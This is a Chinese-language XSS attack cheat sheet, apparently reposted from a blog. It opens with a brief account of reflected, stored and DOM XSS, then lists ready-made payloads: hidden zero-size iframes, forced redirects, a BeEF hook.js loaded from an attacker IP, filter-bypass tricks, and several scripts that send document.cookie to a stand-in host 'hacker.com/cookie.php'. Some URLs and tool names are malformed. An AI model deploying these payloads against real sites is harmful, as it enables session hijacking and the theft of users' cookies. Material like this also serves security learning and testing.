XSS攻击

1.对输入的<>/进行处理后,可预防xss攻击

  反射型xss: 一般是查询输入框中招,将代有木马参数的url发送给某用户,用户点击后即中招

  存储型xss:输入并存储在页面,一般如留言框中招;

       domxss:在URL的哈西值部分(即URL#号后的部分)植入xss攻击

2.在输入框中输入:

  <script> alert(‘xss’)</script>

  出现弹框,显示xss,说明存在xss攻击漏洞,可以进行xss攻击

3.弹框形势有:

  <script> alert(‘xss’)</script>

  <script> alert(document.cookie)</script>

  其中document.cookie可以获取当前浏览器的cookie

4.页面嵌套:

  <iframe src=http://www.baidu.com width=300 height=300></iframe>

  <iframe src=http://www.baidu.com width=0 height=0></iframe>   :这个比上一个更隐蔽,引文边框为0.不易察觉

5.页面重定向:

  <script> window.location="http://www/baidu.com"</script>

  <script> location.href="http://www/baidu.com"</script>

6.弹框警告并重定向:

  <script> alert(‘请移步到我们的新站’);location.href="http://www/baidu.com"</script>

  <script> alert(‘xss’);location.href="http://www/baidu.com/robots.txt"</script>

7.访问恶意代码:

  <script src="http://BeFF_IP:3000/hook.js"></script>      :结合BeFFS收集用户的信息

8.巧用图片标签

  <img src="#" onerror=alert("xss")>    :#不是有效的图片资源,导致图片加载失败,进而触发了oneerror事件,弹出alert弹框,触发CSS攻击

  <img src=“javaScript:alert('xss');">

  <img src="http://BeFF_IP:3000/hook.js"></img>

9.绕开过滤的脚本:

  大小写 <ScrIpt> alert(‘xss’)</SCRipt>

  字符编码 采用url、Base64等编码 <a href="经过编码后的url"></a>

10.收集用户cookie

  打开新窗口并且采用本地cookie访问目标网,打开心窗口并且采用本地cookie访问目标网页。

    <script> window.open("http://www/hacker.com/cookie.php?cookie="+document.cookie)</script>

    <script> window.location="http://www/hacker.com/cookie.php?cookie="+document.cookie</script>

    <script> new Image().src="http://www/hacker.com/cookie.php?cookie="+document.cookie;</script>

    <img src="http://www/hacker.com/cookie.php?cookie="+document.cookie></img>

    <iframe src="http://www/hacker.com/cookie.php?cookie="+document.cookie ></iframe>

    <script>new Image().src="http://www/hacker.com/cookie.php?cookie="+document.cookie;

    img.width = 0;

    img.height = 0;

    </script>

11.BeFF xss自动化攻击

  

原文地址:https://www.cnblogs.com/jingzaixin/p/12372991.html